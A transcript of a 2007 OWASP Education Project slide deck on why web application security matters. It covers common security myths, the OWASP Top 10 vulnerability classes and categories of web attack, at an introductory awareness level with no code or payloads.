OWASP Education Project

Download Report

Transcript OWASP Education Project

Why WebAppsec Matters
Module (to be combined)
OWASP
Education Project
Copyright 2007 © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org
What goes Wrong?
OWASP
2
Public Health Warning
 XSS and CSRF have evolved
 Any website you visit could
infect your browser
 An infected browser can do
anything you can do
 An infected browser can
scan, infect, spread
 70-90% of web applications
are ‘carriers’
OWASP
3 3
Key Application Security Vulnerabilities
http://www.owasp.org/index.php?title=Top_10_2007
OWASP
4
Tools – At Best 45%
 MITRE found that all application
security tool vendors’ claims put
together cover only 45% of the known
vulnerability types (over 600 in CWE)
 They found very little overlap between
tools, so to get 45% you need them all
(assuming their claims are true)
OWASP
5
Myth
Myth: we are secure because we have a
firewall
75% of Internet Vulnerabilities are at Web
Application Layer *
*GartnerGroup (2002 report)
OWASP
6
Myth
Source: Jeremiah Grossman, BlackHat 2001
OWASP
7
Myth
Myth 2 - we are secure because we use SSL
only secures data in transit
does not solve vulnerabilities on:
 Web server
 Browser
OWASP
8
Myth
Source: Jeremiah Grossman, BlackHat 2001
OWASP
9
Billing
Human Resrcs
Directories
APPLICATION
ATTACK
Web Services
Custom Developed
Application Code
Legacy Systems
Your security “perimeter” has huge
holes at the application layer
Databases
Application Layer
Myth
Web Server
Hardened OS
Firewall
Firewall
Network Layer
App Server
You can’t use network layer protection (firewall, SSL, IDS,
hardening) to stop or detect application layer attacks
OWASP
10
What is Web Application Security?
OWASP
11
Web Application Security
Combination of
People,
Processes,
and Technology
to identify, measure, and manage
Risk
presented by COTS , open source, and custom
web applications.
(*)
(*) Commercial Of The Shelf
OWASP
12
People Processes Technology
Training
Awareness
Guidelines
Automated
Testing
Secure
Development
Application
Firewalls
Secure Code
Review
Secure
Configuration
Security Testing
OWASP
13
Web Application (in)Security Trends
OWASP
14
Trends
Business demands more bells and whistles
Internal applications get ‘web-enabled’ and are
exposed to Intranet or Internet
Increasing complexity of software
Rush software out without adequate testing
Poor security training and awareness
OWASP
15
Vulnerabilities: OWASP top 10 (v 2007)
 A1: Cross site scripting (XSS)
 A2: Injection flaws
 A3: Malicious file execution
 A4: Insecure direct object
reference
 A5: Cross site request forgery
(CSRF)
 A6: Information leakage and
improper error handling
 A7: Broken authentication and
session management
 A8: Insecure cryptographic
storage
 A9: Insecure communications
 A10: Failure to restrict URL
access
OWASP
16
Attacks
Defacements
Phishing
Denial of Service
Credit Card Stealing
Bot Infection
...
See the Web Hacking Incidents Database on
http://www.webappsec.org/projects/whid/
OWASP
17